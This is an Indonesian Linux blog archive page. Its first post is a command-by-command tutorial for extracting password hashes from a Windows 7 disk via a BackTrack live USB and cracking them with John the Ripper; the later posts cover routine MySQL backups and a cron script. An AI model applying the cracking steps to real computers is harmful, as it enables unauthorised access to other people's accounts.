Archive for the ‘ Linux ’ Category

Cracking Password Windows 7

Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.

Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.

Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.

Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :

root@root: ~#

Kemudian ketik :

root@root: ~# startx

Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.

root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk

sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:

root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt

File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.

root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7

Cracking Password Win7

Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.

Cracking Password Win7 Tanpa Parameter Charset

Cracking Password Win7 Tanpa Parameter Charset

Tanpa charset alnum:

root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt

Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.

Backup dan Restore Database MySQL lewat Shell/Konsole

Sekedar sharing, beberapa waktu lalu saya dibuat bingung dengan command mysqlimport. Ternyata command ini tidak di peruntukkan restore database, tapi digunakan untuk append data dari database backup ke database asli. Sehingga jika ingin melakukan restore, kita bisa menggunakan command mysql.

Backup Database:

mysqldump -u user_name -ppassword_user namadb /path/nama_db_backup.sql

Atau jika ingin langsung di compress:

mysqldump -u user_name -ppassword_user namadb | gzip > /path/nama_db.gz

Restore Database:

mysql -u user_name -p nama_db < /path/nama_db_backup.sql

Ganti user_name, password, nama_db dan path sesuai dengan parameter anda.

Script Auto Backup Database MySQL pada cPanel

Kemarin sempat browsing cara backup database MySQL lewat Cron Jobs yang tersedia pada linux dan disediakan juga di cPanel. Ternyata langkah yang harus dilakukan tidak terlalu sulit. Bisa langsung menggunakan perintah yang langsung di tulis di Cron Jobs atau dengan cara membuat script. Script yang saya buat disini menggunakan Shell/Bash.

Oke langsung saja.

    1. Terlebih dahulu sebuah buatlah folder backup pada user yg bersangkutan
    2. Kemudian buatlah script untuk backup database MySQL. Disini saya tuliskan script lengkap yang telah saya buat dan nanti akan saya jelaskan satu persatu.
#!/bin/sh
tanggal=`date '+%Y%m%d_%H%M%S'`;
path="/home/user/backup";
find $path/ -mtime +2 -type f -exec rm -rf {} \;
sleep 30;
mysqldump -u userdb -ppassdb namadb | gzip > $path/namadb_$tanggal.gz
    1. Simpan script tersebut dan berilah nama backup.sh
    2. Upload dan letakkan file tersebut pada direktori /bin pada cPanel.
    3. Ubah permission nya menjadi 755.
    4. Masuk ke Cron Jobs, pada menu Add New Cron Job, kemudian setting waktu yang diinginkan untuk melakukan backup.
    5. Pada form Command, masukkan perintah
sh /home/user/bin/backup.sh
  1. Klik tombol “Add New Cron Job”.
  2. Untuk mencoba apakah script yang kita buat berjalan atau tidak, sebaiknya setting waktu waktu eksekusi di Cron Jobs tadi menjadi “Every Minute”, nanti jika script nya sudah berjalan dengan lancar baru ubah lagi sesuai dengan yang diinginkan.

Penjelasan Script

tanggal=`date '+%Y%m%d_%H%M%S'`;

Adalah variabel yang mengambil tanggal pada waktu script di eksekusi, sehingga nama database akan selalu berbeda, sesuai dengan tanggal dan jam backup.

path="/home/user/backup";

Folder dimana database hasil backup akan di simpan.

find $path/ -mtime +2 -type f -exec rm -rf {} \;

Script diatas berfungsi untuk mencari file di dalam folder $path (/home/user/backup) yang mempunyai umur lebih dari 2 hari dari sekarang. Jika file yang dimaksud ditemukan, kemudian file tersebut di delete. Silahkan ubah +2 sesuai dengan kebutuhan anda.

sleep 30;

Digunakan untuk menunggu waktu delete dan waktu backup, supaya tidak berbarengan. 30 adalah dalam detik. Mungkin script ini tidak diperlukan jika database yang didelete kecil atau sedikit. Tapi jika database yang akan didelete besar dan banyak, sebaiknya script ini ditambahkan supaya tidak terlalu memberatkan server.

mysqldump -u userdb -ppassdb namadb | gzip > $path/namadb_$tanggal.gz

mysqldump adalah perintah untuk melakukan backup pada database MySQL. Gantilah userdb, passdb dan namadb sesuai dengan user, password dan database anda. gzip digunakan untuk melakukan kompresi database. Anda juga diperbolehkan untu menggunakan jenis kompresi lain seperti zip, rar dll.

Semoga bermanfaat.

%d bloggers like this: